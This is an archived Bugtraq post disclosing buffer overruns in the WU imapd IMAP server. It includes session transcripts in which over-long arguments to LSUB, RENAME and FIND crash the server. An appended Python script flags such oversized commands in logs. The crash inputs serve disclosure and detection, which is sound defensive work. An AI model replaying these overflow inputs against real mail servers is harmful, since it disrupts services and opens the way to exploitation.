Bugtraq mailing list archives
Re: another WU imapd buffer overflow
From: siva9 () CLICO PL (Michal Szymanski)
Date: Sat, 22 Apr 2000 00:24:33 +0200
Hi again,

imapd seems to be very weak. I've found another three buffer overruns. This time affected commands are LSUB, RENAME and FIND:

* OK mail IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179)
SIGSEGV received.

* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174)
SIGSEGV received.

* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168)
SIGSEGV received.

It seems that all two-argument commands in authenticated state - where second argument is string - are vulnerable. I'm not sure, but ipop2/3d works fine in all states, also in transaction state.

Mark, am I right?

Regards,
Michal Szymanski [michal_szymanski () linux com pl]
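A detection-side illustration of the report above, added here and not part of the original post or of the imapd code: it scans logged IMAP client command lines and flags LSUB, RENAME and FIND commands carrying an over-long argument. The 1000-character limit, the function names and the sample lines are assumptions made for this example; the limit is simply set below the shortest crashing length quoted in the post (1021).

```python
import re

# Commands the post reports as crashing on an over-long second argument.
WATCHED = {"LSUB", "RENAME", "FIND"}
# Assumed alert threshold, chosen below the shortest length in the post (1021).
MAX_ARG_LEN = 1000
# An IMAP quoted string (with backslash escapes) or a bare atom.
_TOKEN = re.compile(r'"((?:[^"\\]|\\.)*)"|(\S+)')

def tokens(line):
    """Split a client line into tag, command and arguments, unquoting strings."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN.finditer(line.strip())]

def oversized_args(line, limit=MAX_ARG_LEN):
    """Return [(COMMAND, arg_index, length)] for watched commands with long args."""
    parts = tokens(line)
    if len(parts) < 3:                      # need tag, command, >= 1 argument
        return []
    command, args = parts[1].upper(), parts[2:]
    if command not in WATCHED:
        return []
    return [(command, i, len(a)) for i, a in enumerate(args, 1) if len(a) > limit]

def scan(lines, limit=MAX_ARG_LEN):
    """Return [(line_number, COMMAND, arg_index, length)] over a list of lines."""
    return [(n, *hit) for n, line in enumerate(lines, 1)
            for hit in oversized_args(line, limit)]

# Constructed sample of client command lines (not a capture from a real server).
SAMPLE = [
    'a1 login siva9 secret',
    'a2 lsub "" ' + 'A' * 1024,
    'a3 rename inbox archive',
    'a4 rename inbox ' + 'A' * 1021,
    'a5 find all.mailboxes ' + 'A' * 1026,
    'a6 select ' + 'A' * 2000,              # long, but not a watched command
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print("line %d: %s argument %d is %d characters long" % hit)
```
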